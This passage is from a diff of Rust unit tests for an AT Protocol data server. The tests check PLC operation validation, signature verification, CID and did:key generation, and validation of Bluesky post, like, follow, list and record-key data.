"rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {"atproto": wrong_key},
|
||||
"alsoKnownAs": ["at://test.handle"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "AtprotoPersonalDataServer",
|
||||
"endpoint": "https://pds.example.com"
|
||||
}
|
||||
},
|
||||
"sig": "test"
|
||||
});
|
||||
|
||||
let ctx = PlcValidationContext {
|
||||
server_rotation_key: did_key.clone(),
|
||||
expected_signing_key: did_key.clone(),
|
||||
expected_handle: "test.handle".to_string(),
|
||||
expected_pds_endpoint: "https://pds.example.com".to_string(),
|
||||
};
|
||||
|
||||
let result = validate_plc_operation_for_submission(&op, &ctx);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_handle_match() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {"atproto": did_key.clone()},
|
||||
"alsoKnownAs": ["at://wrong.handle"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "AtprotoPersonalDataServer",
|
||||
"endpoint": "https://pds.example.com"
|
||||
}
|
||||
},
|
||||
"sig": "test"
|
||||
});
|
||||
|
||||
let ctx = PlcValidationContext {
|
||||
server_rotation_key: did_key.clone(),
|
||||
expected_signing_key: did_key.clone(),
|
||||
expected_handle: "test.handle".to_string(),
|
||||
expected_pds_endpoint: "https://pds.example.com".to_string(),
|
||||
};
|
||||
|
||||
let result = validate_plc_operation_for_submission(&op, &ctx);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_pds_service_type() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {"atproto": did_key.clone()},
|
||||
"alsoKnownAs": ["at://test.handle"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "WrongServiceType",
|
||||
"endpoint": "https://pds.example.com"
|
||||
}
|
||||
},
|
||||
"sig": "test"
|
||||
});
|
||||
|
||||
let ctx = PlcValidationContext {
|
||||
server_rotation_key: did_key.clone(),
|
||||
expected_signing_key: did_key.clone(),
|
||||
expected_handle: "test.handle".to_string(),
|
||||
expected_pds_endpoint: "https://pds.example.com".to_string(),
|
||||
};
|
||||
|
||||
let result = validate_plc_operation_for_submission(&op, &ctx);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_pds_endpoint_match() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {"atproto": did_key.clone()},
|
||||
"alsoKnownAs": ["at://test.handle"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "AtprotoPersonalDataServer",
|
||||
"endpoint": "https://wrong.endpoint.com"
|
||||
}
|
||||
},
|
||||
"sig": "test"
|
||||
});
|
||||
|
||||
let ctx = PlcValidationContext {
|
||||
server_rotation_key: did_key.clone(),
|
||||
expected_signing_key: did_key.clone(),
|
||||
expected_handle: "test.handle".to_string(),
|
||||
expected_pds_endpoint: "https://pds.example.com".to_string(),
|
||||
};
|
||||
|
||||
let result = validate_plc_operation_for_submission(&op, &ctx);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_verify_signature_secp256k1() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"prev": null
|
||||
});
|
||||
|
||||
let signed = sign_operation(&op, &key).unwrap();
|
||||
let rotation_keys = vec![did_key];
|
||||
|
||||
let result = verify_operation_signature(&signed, &rotation_keys);
|
||||
assert!(result.is_ok());
|
||||
assert!(result.unwrap());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_verify_signature_wrong_key() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let other_key = SigningKey::random(&mut rand::thread_rng());
|
||||
let other_did_key = signing_key_to_did_key(&other_key);
|
||||
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"prev": null
|
||||
});
|
||||
|
||||
let signed = sign_operation(&op, &key).unwrap();
|
||||
let wrong_rotation_keys = vec![other_did_key];
|
||||
|
||||
let result = verify_operation_signature(&signed, &wrong_rotation_keys);
|
||||
assert!(result.is_ok());
|
||||
assert!(!result.unwrap());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_verify_signature_invalid_did_key_format() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"prev": null
|
||||
});
|
||||
|
||||
let signed = sign_operation(&op, &key).unwrap();
|
||||
let invalid_keys = vec!["not-a-did-key".to_string()];
|
||||
|
||||
let result = verify_operation_signature(&signed, &invalid_keys);
|
||||
assert!(result.is_ok());
|
||||
assert!(!result.unwrap());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_tombstone_validation() {
|
||||
let op = json!({
|
||||
"type": "plc_tombstone",
|
||||
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
|
||||
"sig": "test"
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(result.is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_cid_for_cbor_deterministic() {
|
||||
let value = json!({
|
||||
"alpha": 1,
|
||||
"beta": 2
|
||||
});
|
||||
|
||||
let cid1 = cid_for_cbor(&value).unwrap();
|
||||
let cid2 = cid_for_cbor(&value).unwrap();
|
||||
|
||||
assert_eq!(cid1, cid2, "CID generation should be deterministic");
|
||||
assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_cid_different_for_different_data() {
|
||||
let value1 = json!({"data": 1});
|
||||
let value2 = json!({"data": 2});
|
||||
|
||||
let cid1 = cid_for_cbor(&value1).unwrap();
|
||||
let cid2 = cid_for_cbor(&value2).unwrap();
|
||||
|
||||
assert_ne!(cid1, cid2, "Different data should produce different CIDs");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_signing_key_to_did_key_format() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
|
||||
assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z");
|
||||
assert!(did_key.len() > 50, "Did key should be reasonably long");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_signing_key_to_did_key_unique() {
|
||||
let key1 = SigningKey::random(&mut rand::thread_rng());
|
||||
let key2 = SigningKey::random(&mut rand::thread_rng());
|
||||
|
||||
let did1 = signing_key_to_did_key(&key1);
|
||||
let did2 = signing_key_to_did_key(&key2);
|
||||
|
||||
assert_ne!(did1, did2, "Different keys should produce different did:keys");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_signing_key_to_did_key_consistent() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
|
||||
let did1 = signing_key_to_did_key(&key);
|
||||
let did2 = signing_key_to_did_key(&key);
|
||||
|
||||
assert_eq!(did1, did2, "Same key should produce same did:key");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_sign_operation_removes_existing_sig() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"prev": null,
|
||||
"sig": "old_signature"
|
||||
});
|
||||
|
||||
let signed = sign_operation(&op, &key).unwrap();
|
||||
let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap();
|
||||
|
||||
assert_ne!(new_sig, "old_signature", "Should replace old signature");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_not_object() {
|
||||
let result = validate_plc_operation(&json!("not an object"));
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_for_submission_tombstone_passes() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
|
||||
let op = json!({
|
||||
"type": "plc_tombstone",
|
||||
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
|
||||
"sig": "test"
|
||||
});
|
||||
|
||||
let ctx = PlcValidationContext {
|
||||
server_rotation_key: did_key.clone(),
|
||||
expected_signing_key: did_key,
|
||||
expected_handle: "test.handle".to_string(),
|
||||
expected_pds_endpoint: "https://pds.example.com".to_string(),
|
||||
};
|
||||
|
||||
let result = validate_plc_operation_for_submission(&op, &ctx);
|
||||
assert!(result.is_ok(), "Tombstone should pass submission validation");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_verify_signature_missing_sig() {
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {}
|
||||
});
|
||||
|
||||
let result = verify_operation_signature(&op, &[]);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_verify_signature_invalid_base64() {
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"sig": "not-valid-base64!!!"
|
||||
});
|
||||
|
||||
let result = verify_operation_signature(&op, &[]);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_plc_operation_struct() {
|
||||
let mut services = HashMap::new();
|
||||
services.insert("atproto_pds".to_string(), PlcService {
|
||||
service_type: "AtprotoPersonalDataServer".to_string(),
|
||||
endpoint: "https://pds.example.com".to_string(),
|
||||
});
|
||||
|
||||
let mut verification_methods = HashMap::new();
|
||||
verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string());
|
||||
|
||||
let op = PlcOperation {
|
||||
op_type: "plc_operation".to_string(),
|
||||
rotation_keys: vec!["did:key:zTest123".to_string()],
|
||||
verification_methods,
|
||||
also_known_as: vec!["at://test.handle".to_string()],
|
||||
services,
|
||||
prev: None,
|
||||
sig: Some("test".to_string()),
|
||||
};
|
||||
|
||||
let json_value = serde_json::to_value(&op).unwrap();
|
||||
assert_eq!(json_value["type"], "plc_operation");
|
||||
assert!(json_value["rotationKeys"].is_array());
|
||||
}
|
||||
590
tests/record_validation.rs
Normal file
590
tests/record_validation.rs
Normal file
@@ -0,0 +1,590 @@
|
||||
use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid};
|
||||
use serde_json::json;
|
||||
|
||||
fn now() -> String {
|
||||
chrono::Utc::now().to_rfc3339()
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_valid() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello world!",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_missing_text() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_missing_created_at() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello"
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_text_too_long() {
|
||||
let validator = RecordValidator::new();
|
||||
let long_text = "a".repeat(3001);
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": long_text,
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_text_at_limit() {
|
||||
let validator = RecordValidator::new();
|
||||
let limit_text = "a".repeat(3000);
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": limit_text,
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_too_many_langs() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello",
|
||||
"createdAt": now(),
|
||||
"langs": ["en", "fr", "de", "es"]
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_three_langs_ok() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello",
|
||||
"createdAt": now(),
|
||||
"langs": ["en", "fr", "de"]
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_too_many_tags() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello",
|
||||
"createdAt": now(),
|
||||
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"]
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_eight_tags_ok() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello",
|
||||
"createdAt": now(),
|
||||
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"]
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_tag_too_long() {
|
||||
let validator = RecordValidator::new();
|
||||
let long_tag = "t".repeat(641);
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello",
|
||||
"createdAt": now(),
|
||||
"tags": [long_tag]
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_profile_valid() {
|
||||
let validator = RecordValidator::new();
|
||||
let profile = json!({
|
||||
"$type": "app.bsky.actor.profile",
|
||||
"displayName": "Test User",
|
||||
"description": "A test user profile"
|
||||
});
|
||||
let result = validator.validate(&profile, "app.bsky.actor.profile");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_profile_empty_ok() {
|
||||
let validator = RecordValidator::new();
|
||||
let profile = json!({
|
||||
"$type": "app.bsky.actor.profile"
|
||||
});
|
||||
let result = validator.validate(&profile, "app.bsky.actor.profile");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_profile_displayname_too_long() {
|
||||
let validator = RecordValidator::new();
|
||||
let long_name = "n".repeat(641);
|
||||
let profile = json!({
|
||||
"$type": "app.bsky.actor.profile",
|
||||
"displayName": long_name
|
||||
});
|
||||
let result = validator.validate(&profile, "app.bsky.actor.profile");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_profile_description_too_long() {
|
||||
let validator = RecordValidator::new();
|
||||
let long_desc = "d".repeat(2561);
|
||||
let profile = json!({
|
||||
"$type": "app.bsky.actor.profile",
|
||||
"description": long_desc
|
||||
});
|
||||
let result = validator.validate(&profile, "app.bsky.actor.profile");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_like_valid() {
|
||||
let validator = RecordValidator::new();
|
||||
let like = json!({
|
||||
"$type": "app.bsky.feed.like",
|
||||
"subject": {
|
||||
"uri": "at://did:plc:test/app.bsky.feed.post/123",
|
||||
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
|
||||
},
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&like, "app.bsky.feed.like");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_like_missing_subject() {
|
||||
let validator = RecordValidator::new();
|
||||
let like = json!({
|
||||
"$type": "app.bsky.feed.like",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&like, "app.bsky.feed.like");
|
||||
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_like_missing_subject_uri() {
|
||||
let validator = RecordValidator::new();
|
||||
let like = json!({
|
||||
"$type": "app.bsky.feed.like",
|
||||
"subject": {
|
||||
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
|
||||
},
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&like, "app.bsky.feed.like");
|
||||
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_like_invalid_subject_uri() {
|
||||
let validator = RecordValidator::new();
|
||||
let like = json!({
|
||||
"$type": "app.bsky.feed.like",
|
||||
"subject": {
|
||||
"uri": "https://example.com/not-at-uri",
|
||||
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
|
||||
},
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&like, "app.bsky.feed.like");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_repost_valid() {
|
||||
let validator = RecordValidator::new();
|
||||
let repost = json!({
|
||||
"$type": "app.bsky.feed.repost",
|
||||
"subject": {
|
||||
"uri": "at://did:plc:test/app.bsky.feed.post/123",
|
||||
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
|
||||
},
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&repost, "app.bsky.feed.repost");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_repost_missing_subject() {
|
||||
let validator = RecordValidator::new();
|
||||
let repost = json!({
|
||||
"$type": "app.bsky.feed.repost",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&repost, "app.bsky.feed.repost");
|
||||
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_follow_valid() {
|
||||
let validator = RecordValidator::new();
|
||||
let follow = json!({
|
||||
"$type": "app.bsky.graph.follow",
|
||||
"subject": "did:plc:test12345",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&follow, "app.bsky.graph.follow");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_follow_missing_subject() {
|
||||
let validator = RecordValidator::new();
|
||||
let follow = json!({
|
||||
"$type": "app.bsky.graph.follow",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&follow, "app.bsky.graph.follow");
|
||||
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_follow_invalid_subject() {
|
||||
let validator = RecordValidator::new();
|
||||
let follow = json!({
|
||||
"$type": "app.bsky.graph.follow",
|
||||
"subject": "not-a-did",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&follow, "app.bsky.graph.follow");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_block_valid() {
|
||||
let validator = RecordValidator::new();
|
||||
let block = json!({
|
||||
"$type": "app.bsky.graph.block",
|
||||
"subject": "did:plc:blocked123",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&block, "app.bsky.graph.block");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_block_invalid_subject() {
|
||||
let validator = RecordValidator::new();
|
||||
let block = json!({
|
||||
"$type": "app.bsky.graph.block",
|
||||
"subject": "not-a-did",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&block, "app.bsky.graph.block");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_list_valid() {
|
||||
let validator = RecordValidator::new();
|
||||
let list = json!({
|
||||
"$type": "app.bsky.graph.list",
|
||||
"name": "My List",
|
||||
"purpose": "app.bsky.graph.defs#modlist",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&list, "app.bsky.graph.list");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_list_name_too_long() {
|
||||
let validator = RecordValidator::new();
|
||||
let long_name = "n".repeat(65);
|
||||
let list = json!({
|
||||
"$type": "app.bsky.graph.list",
|
||||
"name": long_name,
|
||||
"purpose": "app.bsky.graph.defs#modlist",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&list, "app.bsky.graph.list");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_list_empty_name() {
|
||||
let validator = RecordValidator::new();
|
||||
let list = json!({
|
||||
"$type": "app.bsky.graph.list",
|
||||
"name": "",
|
||||
"purpose": "app.bsky.graph.defs#modlist",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&list, "app.bsky.graph.list");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_feed_generator_valid() {
|
||||
let validator = RecordValidator::new();
|
||||
let generator = json!({
|
||||
"$type": "app.bsky.feed.generator",
|
||||
"did": "did:web:example.com",
|
||||
"displayName": "My Feed",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&generator, "app.bsky.feed.generator");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_feed_generator_displayname_too_long() {
|
||||
let validator = RecordValidator::new();
|
||||
let long_name = "f".repeat(241);
|
||||
let generator = json!({
|
||||
"$type": "app.bsky.feed.generator",
|
||||
"did": "did:web:example.com",
|
||||
"displayName": long_name,
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&generator, "app.bsky.feed.generator");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_unknown_type_returns_unknown() {
|
||||
let validator = RecordValidator::new();
|
||||
let custom = json!({
|
||||
"$type": "com.custom.record",
|
||||
"data": "test"
|
||||
});
|
||||
let result = validator.validate(&custom, "com.custom.record");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_unknown_type_strict_rejects() {
|
||||
let validator = RecordValidator::new().require_lexicon(true);
|
||||
let custom = json!({
|
||||
"$type": "com.custom.record",
|
||||
"data": "test"
|
||||
});
|
||||
let result = validator.validate(&custom, "com.custom.record");
|
||||
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_type_mismatch() {
|
||||
let validator = RecordValidator::new();
|
||||
let record = json!({
|
||||
"$type": "app.bsky.feed.like",
|
||||
"subject": {"uri": "at://test", "cid": "bafytest"},
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&record, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
|
||||
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_missing_type() {
|
||||
let validator = RecordValidator::new();
|
||||
let record = json!({
|
||||
"text": "Hello"
|
||||
});
|
||||
let result = validator.validate(&record, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::MissingType)));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_not_object() {
|
||||
let validator = RecordValidator::new();
|
||||
let record = json!("just a string");
|
||||
let result = validator.validate(&record, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_datetime_format_valid() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Test",
|
||||
"createdAt": "2024-01-15T10:30:00.000Z"
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_datetime_with_offset() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Test",
|
||||
"createdAt": "2024-01-15T10:30:00+05:30"
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_datetime_invalid_format() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Test",
|
||||
"createdAt": "2024/01/15"
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. })));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_record_key_valid() {
|
||||
assert!(validate_record_key("3k2n5j2").is_ok());
|
||||
assert!(validate_record_key("valid-key").is_ok());
|
||||
assert!(validate_record_key("valid_key").is_ok());
|
||||
assert!(validate_record_key("valid.key").is_ok());
|
||||
assert!(validate_record_key("valid~key").is_ok());
|
||||
assert!(validate_record_key("self").is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_record_key_empty() {
|
||||
let result = validate_record_key("");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_record_key_dot() {
|
||||
assert!(validate_record_key(".").is_err());
|
||||
assert!(validate_record_key("..").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_record_key_invalid_chars() {
|
||||
assert!(validate_record_key("invalid/key").is_err());
|
||||
assert!(validate_record_key("invalid key").is_err());
|
||||
assert!(validate_record_key("invalid@key").is_err());
|
||||
assert!(validate_record_key("invalid#key").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_record_key_too_long() {
|
||||
let long_key = "k".repeat(513);
|
||||
let result = validate_record_key(&long_key);
|
||||
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_record_key_at_max_length() {
|
||||
